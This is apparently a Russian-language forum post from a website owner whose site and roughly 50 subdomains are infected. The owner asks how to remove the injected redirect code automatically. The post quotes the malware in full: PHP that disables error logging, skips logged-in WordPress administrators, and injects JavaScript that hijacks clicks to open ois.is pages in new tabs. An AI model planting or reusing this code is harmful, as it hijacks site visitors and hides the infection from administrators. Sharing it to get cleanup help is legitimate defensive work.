На сайте и сайтах поддоменов, а их 50 штук, размещен вредоносный код которые делает редикет на другой сайт.
Код везде абсолютно одинаковый и не распознается, как вредоносный. Файлов много. Как можно быстро это почистить ? какие есть варианты? Ручками это самоубийство. Ищу варианты, как можно это сделать автоматизировав процесс.
Код такой:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('display_errors', 0);
$ckUjYggTf = 0;
foreach($_COOKIE as $vUjUnHvOOoO => $vvvUjUnHvOOoO){
if (strstr(strval($vUjUnHvOOoO), 'wordpress_logged_in')){
$ckUjYggTf = 1;
if($ckUjYggTf == 0){
echo '<script>(function (parameters) {
const targets = [
\'https://ois.is/images/logo-1.png\', \'https://ois.is/images/logo-2.png\', \'https://ois.is/images/logo-3.png\', \'https://ois.is/images/logo-4.png\', \'https://ois.is/images/logo-5.png\', \'https://ois.is/images/logo-6.png\', \'https://ois.is/images/logo-7.png\', \'https://ois.is/images/logo-8.png\'
// Times between clicks
const restMinutes = 1;
// Number of hours to allow re-click
const allowedHours = 2;
const saveTargetLocationsToStorage = (targets) => {
targets.forEach((target, index) => {
localStorage.setItem(`${target}-local-storage`, 0);
const getRandomLocationFromStorage = (targets) => {
const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
return nonVisited[Math.floor(Math.random() * nonVisited.length)];
const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);
const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);
const getHoursDiff = (startDate, endDate) => {
const msInHour = 1000 * 60 * 60;
return Math.round(Math.abs(endDate - startDate) / msInHour);
const getMintsDiff = (startDate, endDate) => {
const msInMints = 1000 * 60;
return Math.round(Math.abs(endDate - startDate) / msInMints);
const visitNewLocation = (targets, host, nowDate) => {
newLocation = getRandomLocationFromStorage(targets);
setTimeToStorage(`${host}-mnts`, nowDate);
setTimeToStorage(`${host}-hurs`, nowDate);
window.open(newLocation, "_blank");
// const randomLocation = getRandomLocationFromStorage(targets);
function globalClick(event) {
const host = location.host;
let newLocation = getRandomLocationFromStorage(targets);
const nowDate = Date.parse(new Date());
const savedDateForMints = getTimeStorage(`${host}-mnts`);
const savedDateForHours = getTimeStorage(`${host}-hurs`);
if (savedDateForMints && savedDateForHours) {
try {
const storageDateForMints = parseInt(savedDateForMints);
const storageDateForHours = parseInt(savedDateForHours);
const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
const hoursDiff = getHoursDiff(nowDate, storageDateForHours);
if (hoursDiff >= allowedHours) {
setTimeToStorage(`${host}-hurs`, nowDate);
if (mintsDiff >= restMinutes) {
if (newLocation) {
setTimeToStorage(`${host}-mnts`, nowDate);
window.open(newLocation, "_blank");
} catch (error) { visitNewLocation(targets, host, nowDate); }
} else { visitNewLocation(targets, host, nowDate); }
document.addEventListener("click", globalClick)